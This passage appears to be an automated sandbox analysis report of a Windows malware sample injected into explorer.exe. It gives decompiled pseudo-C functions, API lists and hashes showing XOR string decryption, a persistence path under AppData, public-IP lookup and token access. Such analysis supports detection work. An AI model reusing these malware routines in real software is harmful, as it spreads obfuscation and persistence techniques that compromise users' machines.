0x003f68a3
0x003f68ad
0x003f68be
0x003f68be
0x00000000
0x003f68c4
0x003f67bf
0x00000000
0x003f6772
0x00000000
0x003f6750
0x003f64b9
0x003f64bb
0x00000000
0x00000000
0x003f64bd
0x00000000

APIs

lstrcpynW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe,00000104), ref: 003F6536

Strings

C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 003F652D

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcpyn
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
API String ID: 97706510-3541507623
Opcode ID: 1b099fa57e1789db6cd7fe7b69fcfd7a0a6b7b26a62804058ad49751bf816fed
Instruction ID: 5a9029b2d12b3db012a3b4ce9a9a1fc382f54a4f817f7307b8b24482cf42c107
Opcode Fuzzy Hash: 1b099fa57e1789db6cd7fe7b69fcfd7a0a6b7b26a62804058ad49751bf816fed
Instruction Fuzzy Hash: 94F11AB4A00208EFCB05DF94D895FAEB7B5BF88304F248568EA199B395D731EA45CF50

Uniqueness

Uniqueness Score: 100.00%

Function 01514C10, Relevance: 3.2, APIs: 2, Instructions: 190
timeUNIQUE

Download Yara Rule

C-Code - Quality: 53%

			E01514C10(signed long long __fp0, intOrPtr _a4, void* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				struct _SYSTEMTIME _v32;
				char _v36;
				signed int _v40;
				char _v44;
				long _v48;
				signed int _v52;
				signed int _t75;
				char _t76;
				intOrPtr _t79;
				intOrPtr _t87;
				void* _t90;
				intOrPtr _t97;
				void* _t141;
				void* _t142;
				void* _t143;
				signed long long _t148;

				_t148 = __fp0;
				_v40 = 0;
				_v36 = 0;
				_v16 = 0;
				_v12 = 0;
				 *_a8 = 0;
				_t106 = _a4;
				_t75 = E01514ED0(_a4);
				_t142 = _t141 + 4;
				_v40 = _t75;
				if(_v40 == 0) {
					_v40 = 0xfa000;
				}
				if(_a20 != 0) {
					E01514E70(_t106, _a4, _a20, 0x80);
					_t142 = _t142 + 0xc;
				}
				do {
				} while (0 != 0);
				_t76 = E01513960(0, 0x10400); // executed
				_t143 = _t142 + 4;
				_v12 = _t76;
				if(_v12 != 0) {
					_t79 = E01513960(0, _v40 + 1); // executed
					_t143 = _t143 + 4;
					 *_a8 = _t79;
					if( *_a8 != 0) {
						if(_a16 != 0) {
							GetSystemTime( &_v32);
						}
						while(1 != 0) {
							_v44 = 0;
							_t90 =  *0x153ada4(_a4, _v12, 0x10400,  &_v44); // executed
							if(_t90 != 0) {
								if(_a24 != 0) {
									E01514080(_a24);
									_t143 = _t143 + 4;
								}
								if(_v44 != 0) {
									if(_v36 + _v44 <= _v40) {
										L37:
										E01513AC0( *_a8 + _v36,  *_a8 + _v36, _v12, _v44);
										_t143 = _t143 + 0xc;
										_v36 = _v36 + _v44;
										continue;
									}
									while(0 != 0) {
									}
									if(_v40 >= 0x10400) {
										_v52 = _v40 << 1;
									} else {
										_v52 = 0x10400;
									}
									_v40 = _v52;
									_t97 = E01513A40(_v40 + 1, _a8, _v36, _v40 + 1);
									_t143 = _t143 + 0xc;
									 *_a8 = _t97;
									if( *_a8 != 0) {
										goto L37;
									} else {
										while(0 != 0) {
										}
										_v16 = 0xfffffffc;
										L43:
										if(_v16 < 0 &&  *_a8 != 0) {
											E01513990(_a8, _v40 + 1);
											_t143 = _t143 + 8;
										}
										if(_v12 != 0) {
											E01513990( &_v12, 0x10400);
										}
										return _v16;
									}
								} else {
									break;
								}
							}
							_v48 = GetLastError();
							if(_a24 != 0) {
								E01514080(_a24);
								_t143 = _t143 + 4;
							}
							while(0 != 0) {
							}
							_v16 = 0xfffffffd;
							goto L43;
						}
						_v8 =  *_a8;
						 *((char*)(_v8 + _v36)) = 0;
						if(_a12 != 0) {
							 *_a12 = _v36;
						}
						if(_a16 != 0) {
							_t87 = E015143C0(_t148,  &_v32, _v36);
							_t143 = _t143 + 8;
							 *_a16 = _t87;
						}
						_v16 = 0;
						goto L43;
					}
					while(0 != 0) {
					}
					_v16 = 0xfffffff6;
					goto L43;
				}
				while(0 != 0) {
				}
				_v16 = 0xfffffff5;
				goto L43;
			}

0x01514c10
0x01514c16
0x01514c1d
0x01514c24
0x01514c2b
0x01514c35
0x01514c3b
0x01514c3f
0x01514c44
0x01514c47
0x01514c4e
0x01514c50
0x01514c50
0x01514c5b
0x01514c6a
0x01514c6f
0x01514c6f
0x01514c72
0x01514c72
0x01514c7d
0x01514c82
0x01514c85
0x01514c8c
0x01514ca7
0x01514cac
0x01514cb2
0x01514cba
0x01514cd2
0x01514cd8
0x01514cd8
0x01514cde
0x01514ceb
0x01514d03
0x01514d0b
0x01514d3e
0x01514d44
0x01514d49
0x01514d49
0x01514d50
0x01514d60
0x01514dbb
0x01514dcc
0x01514dd1
0x01514dda
0x00000000
0x01514dda
0x01514d62
0x01514d66
0x01514d6f
0x01514d7f
0x01514d71
0x01514d71
0x01514d71
0x01514d85
0x01514d97
0x01514d9c
0x01514da2
0x01514daa
0x00000000
0x01514dac
0x01514dac
0x01514db0
0x01514db2
0x01514e23
0x01514e27
0x01514e3c
0x01514e41
0x01514e41
0x01514e48
0x01514e53
0x01514e58
0x01514e61
0x01514e61
0x01514d52
0x00000000
0x01514d52
0x01514d50
0x01514d13
0x01514d1a
0x01514d20
0x01514d25
0x01514d25
0x01514d28
0x01514d2c
0x01514d2e
0x00000000
0x01514d2e
0x01514de7
0x01514df0
0x01514df7
0x01514dff
0x01514dff
0x01514e05
0x01514e0f
0x01514e14
0x01514e1a
0x01514e1a
0x01514e1c
0x00000000
0x01514e1c
0x01514cbc
0x01514cc0
0x01514cc2
0x00000000
0x01514cc2
0x01514c8e
0x01514c92
0x01514c94
0x00000000

APIs

Part of subcall function 01513960: HeapAlloc.KERNEL32(018E0000,00000008,0152C2F8,?,?,01513A10,015150C5,?,?,015150C6,0152C2F8,00000839), ref: 01513971

GetSystemTime.KERNEL32(01514BCB), ref: 01514CD8
GetLastError.KERNEL32 ref: 01514D0D

Part of subcall function 01514080: GetSystemTimeAsFileTime.KERNEL32(0150639D,?,?,015077B6,015379D0,0150639D), ref: 0151408A
Part of subcall function 01514080: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015140B6

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: Time$System$AllocErrorFileHeapLastUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2444822768-0
Opcode ID: e1c61cb27a88177c426ab4666f6bc02358b26c12678549a9b03382b8730a9021
Instruction ID: f56da6064b65bb2cfb36ec2baa35ce8a77122b9195b1d588e1495c04042b2b66
Opcode Fuzzy Hash: e1c61cb27a88177c426ab4666f6bc02358b26c12678549a9b03382b8730a9021
Instruction Fuzzy Hash: 637149B4900209DFEF16CF98D884BEEBBB1BB48318F149618E915AF288D7359984CB51

Uniqueness

Uniqueness Score: 100.00%

Function 01515080, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 121
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E01515080(void* __eflags, signed int _a4) {
				int _v8;
				signed int _v12;
				signed int _v16;
				void _v82;
				short _v84;
				signed int _v88;
				char _v92;
				short _t51;
				signed int _t53;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				char _t70;
				void* _t71;
				signed int _t84;
				signed int _t89;
				signed int _t95;
				void* _t100;
				void* _t102;
				void* _t104;

				_v8 = 0;
				_v16 = 0x100;
				_t51 =  *0x152a6e0; // 0x0
				_v84 = _t51;
				_t77 =  &_v82;
				memset( &_v82, 0, 0x3e);
				_v16 = _v16 + _a4;
				_t53 = E01513A00( &_v82, 0x152c2f8, 0x839);
				_t102 = _t100 + 0x14;
				 *0x153885c = _t53;
				if( *0x153885c != 0) {
					if((_v16 & 0x00000003) == 0) {
						L7:
						 *0x1538858 = 0;
						_v12 = 0;
						_v88 = 1;
						while(_v12 < 0x838) {
							_t24 = _v12 % 0x40 + 0x15363b0; // 0xc665b518
							_t64 =  *0x153885c; // 0x18e0590
							_t95 =  *0x153885c; // 0x18e0590
							 *((char*)(_t95 + _v12)) =  *(_t64 + _v12) ^  *_t24;
							_t66 =  *0x153885c; // 0x18e0590
							if( *((char*)(_t66 + _v12)) == 0) {
								_v16 = _a4;
								_t68 = _v12;
								_t84 =  *0x153885c; // 0x18e0590
								_t32 = _t68 + 1; // 0x18e0591
								0x153ab00[_v88] = _t84 + _t32;
								_v88 = _v88 + 1;
							}
							_t77 = _v12 + 1;
							_v12 = _v12 + 1;
						}
						_t89 =  *0x153885c; // 0x18e0590
						 *0x153ab00 = _t89;
						_v88 = 0;
						while(_v88 < 0x100) {
							if(_v88 < 0x41 || _v88 > 0x5a) {
								_t77 = _v88;
								 *((char*)(_v88 + 0x153ac80)) = _v88;
							} else {
								_t77 = _v88 + 0x20;
								 *((char*)(_v88 + 0x153ac80)) = _v88 + 0x20;
							}
							_v88 = _v88 + 1;
						}
						if(E015167E0(_t77, _a4) >= 0) {
							return 0;
						}
						return 0xfffffffe;
					}
					_t70 = E01515350( &_v82, 0x2a50);
					_t102 = _t102 + 4;
					_v92 = _t70;
					if(_v92 == 0) {
						goto L7;
					}
					_t77 = _v92;
					_t71 = E0151BCA0(_v92); // executed
					_t104 = _t102 + 4;
					if(_t71 == 0) {
						E01515460( &_v92);
						_t102 = _t104 + 4;
						goto L7;
					}
					return E01515460( &_v92) | 0xffffffff;
				}
				return _t53 | 0xffffffff;
			}

0x01515086
0x0151508d
0x01515094
0x0151509a
0x015150a2
0x015150a6
0x015150b4
0x015150c1
0x015150c6
0x015150c9
0x015150d5
0x015150e5
0x0151512d
0x0151512d
0x01515137
0x0151513e
0x01515150
0x01515165
0x0151516c
0x01515179
0x01515182
0x01515184
0x01515191
0x01515196
0x01515199
0x0151519c
0x015151a2
0x015151a9
0x015151b6
0x015151b6
0x0151514a
0x0151514d
0x0151514d
0x015151bb
0x015151c1
0x015151c7
0x015151d9
0x015151e6
0x01515202
0x01515205
0x015151ee
0x015151f1
0x015151f7
0x015151f7
0x015151d6
0x015151d6
0x0151521b
0x00000000
0x01515224
0x00000000
0x0151521d
0x015150ec
0x015150f1
0x015150f4
0x015150fb
0x00000000
0x00000000
0x015150fd
0x01515101
0x01515106
0x0151510b
0x01515125
0x0151512a
0x00000000
0x0151512a
0x00000000
0x01515119
0x00000000

APIs

memset.MSVCRT(?,00000000,0000003E), ref: 015150A6

Strings

Z, xrefs: 015151E8

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: Z
API String ID: 2221118986-1505515367
Opcode ID: d87c3456a13efa0b1215a8c30a59ea968ae1bfcf7277029b1c07eaa0e30767b8
Instruction ID: c2ac99119d5f4b3dc2a0f2c4f63905a2f1448c724be446d3911d9454dbe9c4c8
Opcode Fuzzy Hash: d87c3456a13efa0b1215a8c30a59ea968ae1bfcf7277029b1c07eaa0e30767b8
Instruction Fuzzy Hash: 3A51B075910248CBEB16CFD4E8506ADBBB1BF86304F148658E4625F389E774964CCF40

Uniqueness

Uniqueness Score: 100.00%

Function 003F7D90, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 121
UNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E003F7D90(void* __eflags, signed int _a4) {
				int _v8;
				signed int _v12;
				signed int _v16;
				void _v82;
				short _v84;
				signed int _v88;
				char _v92;
				short _t51;
				signed int _t53;
				void* _t56;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				char _t70;
				void* _t71;
				signed int _t84;
				signed int _t89;
				signed int _t95;
				void* _t100;
				void* _t102;
				void* _t104;

				_v8 = 0;
				_v16 = 0x100;
				_t51 =  *0x405240; // 0x0
				_v84 = _t51;
				_t77 =  &_v82;
				memset( &_v82, 0, 0x3e);
				_v16 = _v16 + _a4;
				_t53 = E003F3F80( &_v82, 0x405340, 0x839);
				_t102 = _t100 + 0x14;
				 *0x40f6e8 = _t53;
				if( *0x40f6e8 != 0) {
					if((_v16 & 0x00000003) == 0) {
						L7:
						 *0x40f6e4 = 0;
						_v12 = 0;
						_v88 = 1;
						while(_v12 < 0x838) {
							_t24 = _v12 % 0x40 + 0x40f268; // 0xc665b518
							_t64 =  *0x40f6e8; // 0x15a0590
							_t95 =  *0x40f6e8; // 0x15a0590
							 *((char*)(_t95 + _v12)) =  *(_t64 + _v12) ^  *_t24;
							_t66 =  *0x40f6e8; // 0x15a0590
							if( *((char*)(_t66 + _v12)) == 0) {
								_v16 = _a4;
								_t68 = _v12;
								_t84 =  *0x40f6e8; // 0x15a0590
								_t32 = _t68 + 1; // 0x15a0591
								0x411720[_v88] = _t84 + _t32;
								_v88 = _v88 + 1;
							}
							_t77 = _v12 + 1;
							_v12 = _v12 + 1;
						}
						_t89 =  *0x40f6e8; // 0x15a0590
						 *0x411720 = _t89;
						_v88 = 0;
						while(_v88 < 0x100) {
							if(_v88 < 0x41 || _v88 > 0x5a) {
								_t77 = _v88;
								 *((char*)(_v88 + 0x4118a0)) = _v88;
							} else {
								_t77 = _v88 + 0x20;
								 *((char*)(_v88 + 0x4118a0)) = _v88 + 0x20;
							}
							_v88 = _v88 + 1;
						}
						_t56 = E003F7CF0(_t77, _a4); // executed
						if(_t56 >= 0) {
							return 0;
						}
						return 0xfffffffe;
					}
					_t70 = E003F8060( &_v82, 0x2a50);
					_t102 = _t102 + 4;
					_v92 = _t70;
					if(_v92 == 0) {
						goto L7;
					}
					_t77 = _v92;
					_t71 = E003FE040(_v92);
					_t104 = _t102 + 4;
					if(_t71 == 0) {
						E003F8170( &_v92);
						_t102 = _t104 + 4;
						goto L7;
					}
					return E003F8170( &_v92) | 0xffffffff;
				}
				return _t53 | 0xffffffff;
			}

0x003f7d96
0x003f7d9d
0x003f7da4
0x003f7daa
0x003f7db2
0x003f7db6
0x003f7dc4
0x003f7dd1
0x003f7dd6
0x003f7dd9
0x003f7de5
0x003f7df5
0x003f7e3d
0x003f7e3d
0x003f7e47
0x003f7e4e
0x003f7e60
0x003f7e75
0x003f7e7c
0x003f7e89
0x003f7e92
0x003f7e94
0x003f7ea1
0x003f7ea6
0x003f7ea9
0x003f7eac
0x003f7eb2
0x003f7eb9
0x003f7ec6
0x003f7ec6
0x003f7e5a
0x003f7e5d
0x003f7e5d
0x003f7ecb
0x003f7ed1
0x003f7ed7
0x003f7ee9
0x003f7ef6
0x003f7f12
0x003f7f15
0x003f7efe
0x003f7f01
0x003f7f07
0x003f7f07
0x003f7ee6
0x003f7ee6
0x003f7f21
0x003f7f2b
0x00000000
0x003f7f34
0x00000000
0x003f7f2d
0x003f7dfc
0x003f7e01
0x003f7e04
0x003f7e0b
0x00000000
0x00000000
0x003f7e0d
0x003f7e11
0x003f7e16
0x003f7e1b
0x003f7e35
0x003f7e3a
0x00000000
0x003f7e3a
0x00000000
0x003f7e29
0x00000000

APIs

memset.MSVCRT(?,00000000,0000003E), ref: 003F7DB6

Strings

Z, xrefs: 003F7EF8

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: memset
String ID: Z
API String ID: 2221118986-1505515367
Opcode ID: df4bbd9bd3e387a8d69eb17884861089a8f2bda655b6d51e7421a44e5775e11c
Instruction ID: ce8456044c5c6d4d7c2217835d4a1b6e75c7b113dff558bedb66739c69d00a0b
Opcode Fuzzy Hash: df4bbd9bd3e387a8d69eb17884861089a8f2bda655b6d51e7421a44e5775e11c
Instruction Fuzzy Hash: DB51DF70D0424CDBDB06CFE4D980ABDBBB1AF44304F1485B9D6026F395D7399A89CB85

Uniqueness

Uniqueness Score: 100.00%

Function 0151D810, Relevance: 3.1, APIs: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0151D630: GetCurrentThread.KERNEL32(0151D843,00000000,00000008,?,?,0151D843,00000008), ref: 0151D63E
Part of subcall function 0151D630: OpenThreadToken.ADVAPI32(00000000,?,?,0151D843,00000008), ref: 0151D645
Part of subcall function 0151D630: GetLastError.KERNEL32(?,?,0151D843,00000008), ref: 0151D64F
Part of subcall function 0151D630: GetCurrentProcess.KERNEL32(0151D843,00000008,?,?,0151D843,00000008), ref: 0151D664
Part of subcall function 0151D630: OpenProcessToken.ADVAPI32(00000000,?,?,0151D843,00000008), ref: 0151D66B

CloseHandle.KERNEL32(00000000), ref: 0151D8FA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentOpenProcessThreadToken$CloseErrorHandleLast
String ID:
API String ID: 664640673-0
Opcode ID: aa0f32c28a9beabd154e100e307a0192125014382877a529358a9fe88b71de14
Instruction ID: b1b778474132d73969e43d884ac80eff039925fd8277eb3a3bb4ab4b00a25029
Opcode Fuzzy Hash: aa0f32c28a9beabd154e100e307a0192125014382877a529358a9fe88b71de14
Instruction Fuzzy Hash: A4316D75D00209EBFB12DFE4C84DBAEBBB5BF44304F108458D905AF289D3B95649DBA1

Uniqueness

Uniqueness Score: 0.03%

Function 01508AEC, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 88
stringUNIQUE

Download Yara Rule

C-Code - Quality: 100%

			E01508AEC(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16, intOrPtr* _a20, intOrPtr _a24) {
				CHAR* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				CHAR* _v28;
				char _t29;
				CHAR* _t30;
				CHAR* _t37;
				CHAR* _t42;
				CHAR* _t44;
				CHAR* _t56;
				void* _t59;
				void* _t60;

				_t56 = 0;
				_v12 = 0;
				_v20 = 0;
				_v28 = 0;
				_v8 = 0;
				_v16 = 0;
				_v24 = 0;
				_t29 = E015089E9(__ecx, _a4, _a8,  &_v20);
				_t60 = _t59 + 0xc;
				_v24 = _t29;
				if(_t29 == 0) {
					return 0;
				}
				_t30 = E0151C010(_t29, _v20);
				_v28 = _t30;
				__eflags = _t30;
				if(__eflags != 0) {
					_t42 = E015088FC(__eflags, _t30);
					_v8 = _t42;
					__eflags = _t42;
					if(_t42 != 0) {
						_t44 = E01514F30(_a12, _v8, lstrlenA(_t42),  &_v16,  &_v12, 2, _a24); // executed
						_t60 = _t60 + 0x1c;
						__eflags = _t44;
						if(_t44 >= 0) {
							_t56 = 1;
							__eflags = 1;
						}
					}
				}
				E01513990( &_v24, 0);
				E01513990( &_v28, 0xffffffff);
				E01513990( &_v8, 0xffffffff); // executed
				_t37 = _a16;
				__eflags = _t37;
				if(_t37 == 0) {
					E01513990( &_v16, _v12);
				} else {
					 *_t37 = _v16;
					 *_a20 = _v12;
				}
				return _t56;
			}

0x01508b00
0x01508b02
0x01508b05
0x01508b08
0x01508b0b
0x01508b0e
0x01508b11
0x01508b14
0x01508b19
0x01508b1c
0x01508b21
0x00000000
0x01508b23
0x01508b2e
0x01508b35
0x01508b38
0x01508b3a
0x01508b3d
0x01508b43
0x01508b46
0x01508b48
0x01508b65
0x01508b6a
0x01508b6d
0x01508b6f
0x01508b73
0x01508b73
0x01508b73
0x01508b6f
0x01508b48
0x01508b79
0x01508b84
0x01508b8f
0x01508b94
0x01508b9a
0x01508b9c
0x01508bb4
0x01508b9e
0x01508ba1
0x01508ba9
0x01508ba9
0x00000000

APIs

Part of subcall function 015089E9: memcpy.MSVCRT(00000010,?,?,?,00000010,?,015394FC,?,00000010,00000000,00000000), ref: 01508A47

lstrlenA.KERNEL32(00000000,?,?,00000002,00000000,?,readrr956964,00000000,?,?,?,?,?,01509768,00000000,00000000), ref: 01508B58

Strings

readrr956964, xrefs: 01508AF3

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlenmemcpy
String ID: readrr956964
API String ID: 3992512336-619279942
Opcode ID: a4211bd8bce02114658935fe39ac59e595fa59a77c6fb9d816dfbe87ee670151
Instruction ID: bf69fd89ab21a0450f0d5720803b58c6a7c9282a6ee9501eff5a780da071e70d
Opcode Fuzzy Hash: a4211bd8bce02114658935fe39ac59e595fa59a77c6fb9d816dfbe87ee670151
Instruction Fuzzy Hash: C22123B1D0421AAFDF12DFE8DC45C9EBBB9FF58710F100556F511EB294E63096508BA4

Uniqueness

Uniqueness Score: 100.00%

Function 0150678F, Relevance: 3.1, APIs: 2, Instructions: 84
stringUNIQUE

Download Yara Rule

C-Code - Quality: 81%

			E0150678F(void* __fp0, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				char _v8;
				void* _v12;
				char _v44;
				void* _t19;
				void* _t25;
				char* _t30;
				void* _t40;
				void* _t45;
				void* _t46;
				char* _t47;

				_v8 = 0;
				_v12 = 0;
				_t19 = E01514B40(__fp0, _a4,  &_v8,  &_v12, 0, 0, 0); // executed
				if(_t19 != 0) {
					L7:
					if(_v8 != 0) {
						E01513990( &_v8, 0);
					}
					return 0;
				}
				_t45 = E01513DD0(_v8, _a8);
				if(_t45 == 0) {
					goto L7;
				}
				_t46 = _t45 + lstrlenA(_a8);
				_t25 = E01513DD0(_t46, _a12);
				_pop(_t40);
				if(_t25 == 0) {
					goto L7;
				}
				_t44 = _t25 - _t46;
				if(_t25 - _t46 >= 0x20) {
					goto L7;
				}
				E01513BA0(_t40,  &_v44, 0, 0x20);
				E01513AC0(_t40,  &_v44, _t46, _t44);
				_t30 =  &_v44;
				__imp__#11(_t30);
				_t47 = _t30;
				if(_t47 == 0xffffffff || _t47 == 0) {
					goto L7;
				} else {
					E01513990( &_v8, _v12); // executed
					return _t47;
				}
			}

0x015067a8
0x015067ab
0x015067ae
0x015067b8
0x01506831
0x01506834
0x0150683b
0x01506841
0x00000000
0x01506842
0x015067c5
0x015067cb
0x00000000
0x00000000
0x015067d9
0x015067dc
0x015067e2
0x015067e5
0x00000000
0x00000000
0x015067e9
0x015067ee
0x00000000
0x00000000
0x015067f7
0x01506802
0x0150680a
0x0150680e
0x01506814
0x01506819
0x00000000
0x0150681f
0x01506826
0x00000000
0x0150682d

APIs

lstrlenA.KERNEL32(0152A5A8,?,?,?,?,00000000,?,?,?,?,?,01506885,http://www.ip-adress.com,IP address is: ,0152A5A8,?), ref: 015067D0
#11.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0150680E

Part of subcall function 01513990: lstrlenA.KERNEL32(01515216,?,0151546E,01516857,000000FF), ref: 015139A7
Part of subcall function 01513990: HeapFree.KERNEL32(018E0000,00000000,00000000), ref: 015139EA

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeHeap
String ID:
API String ID: 4056650430-0
Opcode ID: f8f4b2ef1d86df17113757ac2ec4a4d2078253f3f27629f528e40e882cba0633
Instruction ID: cfe944762aa729de8935fba62863becc39c27c92cae588744661171d8d1ac343
Opcode Fuzzy Hash: f8f4b2ef1d86df17113757ac2ec4a4d2078253f3f27629f528e40e882cba0633
Instruction Fuzzy Hash: 062184B7904119BFEF22AFE89C848DE7BEDFF54664B140536E900EA084EA319B549750

Uniqueness

Uniqueness Score: 100.00%

Function 003F1F20, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 65
stringUNIQUE

Download Yara Rule

C-Code - Quality: 16%

			E003F1F20() {
				WCHAR* _v8;
				char _v12;
				void* _v16;
				char _v20;
				WCHAR* _v24;
				intOrPtr _t19;
				char _t20;

				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				while(0 != 0) {
				}
				_t19 =  *0x4117b0; // 0x15a076a
				_t20 = E003F84C0(_t19,  &_v16,  &_v12); // executed
				_v20 = _t20;
				if(_v20 != 0) {
					_v24 = E003F3EE0( &_v12, 0x20a);
					if(_v24 != 0) {
						lstrcpynW(_v24, "C:\Users\Luke\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe", 0x20a);
						while(0 != 0) {
						}
						E003F6E30(_v20, _v16, _v24, 0); // executed
						E003F3F10( &_v20, _v16);
						return 0;
					}
					while(0 != 0) {
					}
					return 1;
				}
				while(0 != 0) {
				}
				return 1;
			}

0x003f1f26
0x003f1f2d
0x003f1f34
0x003f1f3b
0x003f1f42
0x003f1f49
0x003f1f4d
0x003f1f57
0x003f1f5d
0x003f1f65
0x003f1f6c
0x003f1f88
0x003f1f8f
0x003f1fac
0x003f1fb2
0x003f1fb6
0x003f1fc6
0x003f1fd6
0x00000000
0x003f1fde
0x003f1f91
0x003f1f95
0x00000000
0x003f1f97
0x003f1f6e
0x003f1f72
0x00000000

APIs

Part of subcall function 003F3EE0: HeapAlloc.KERNEL32(015A0000,00000008,00405340,?,?,003F3F90,003F7DD5,?,?,003F7DD6,00405340,00000839), ref: 003F3EF1

lstrcpynW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe,0000020A), ref: 003F1FAC

Strings

C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe, xrefs: 003F1FA3

Memory Dump Source

Source File: 0000000C.00000002.752639572.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3f0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocHeaplstrcpyn
String ID: C:\Users\user\AppData\Roaming\Microsoft\Eacrrvkown\jkfkdm.exe
API String ID: 1514998405-3541507623
Opcode ID: 8ff83f6dbcbac735a841f17880498473c0d04b7cf1b0197d1cb5f55f649f169a
Instruction ID: ca361c53c1ddbd4d1f0e06cd82132cb3dbe5edf2b52bc4b8ccb555b547b1ab17
Opcode Fuzzy Hash: 8ff83f6dbcbac735a841f17880498473c0d04b7cf1b0197d1cb5f55f649f169a
Instruction Fuzzy Hash: 821196B1E0430DDBDF01DBE4EC06FBFB378AB04304F504669E215A7281D7755A448B91

Uniqueness

Uniqueness Score: 100.00%

Function 015068B4, Relevance: 3.1, APIs: 2, Instructions: 51
stringUNIQUE

Download Yara Rule

C-Code - Quality: 84%

			E015068B4(void* __ebx, void* __eflags, void* __fp0, CHAR* _a4) {
				void* _t9;
				void* _t14;
				CHAR* _t17;

				_t17 = _a4;
				E01513BA0(_t14, _t17, 0, 0x498);
				if(E01506849(_t14, __fp0) == 0) {
					lstrcpyA(_t17, "?");
					E01513D60(_t14,  &(_t17[0x10]), "?", 0x100);
				} else {
					__imp__#12(0x10, __ebx);
					E01513D60(_t14, _t17, _t4, _t4);
					_t12 =  &(_t17[0x10]);
					_t9 = E01516380(_t17,  &(_t17[0x10]), 0x100); // executed
					if(_t9 < 0) {
						E01513D60(_t14, _t12, "?", 0x100);
					}
				}
				return 0;
			}

0x015068b8
0x015068c4
0x015068d3
0x01506916
0x01506926
0x015068d5
0x015068d9
0x015068e1
0x015068ec
0x015068f1
0x015068fb
0x01506904
0x01506909
0x0150690c
0x01506933

APIs

Part of subcall function 01506849: #11.WS2_32(00000000,?,015068D1,01501F74,?), ref: 01506862
Part of subcall function 01506849: #12.WS2_32(00000000,?,015068D1,01501F74,?), ref: 0150688F

#12.WS2_32(00000000,00000010,?,01501F74,?), ref: 015068D9

Part of subcall function 01516380: #11.WS2_32(00000000), ref: 01516398
Part of subcall function 01516380: #51.WS2_32(00000000,00000004,00000002), ref: 015163A9

lstrcpyA.KERNEL32(?,0152A5AC,01501F74,?), ref: 01506916

Memory Dump Source

Source File: 0000000C.00000002.753280657.01500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1500000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1e178e7b2842bb51905458db6b6c82c76ff717998e56656d15f0ad271706e282
Instruction ID: a0f647f13748616ef1ed5be670bd9a92f558eb07a863735b65e1bbc64a3db860
Opcode Fuzzy Hash: 1e178e7b2842bb51905458db6b6c82c76ff717998e56656d15f0ad271706e282
Instruction Fuzzy Hash: 0DF0C8B3A002163AF63339A56C05FDB365CBFD6664F440424F9049E586E6556620C2B5

Uniqueness

Uniqueness Score: 100.00%

Function 003F7CF0, Relevance: 3.0, APIs: 2, Instructions: 50
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E003F7CF0(void* __ecx, intOrPtr _a4) {
				CHAR* _v8;
				CHAR* _v12;
				void* _t18;

				_v12 = E003F8060(__ecx, 0x925);
				_v8 = E003F8060(__ecx, 0x1809);
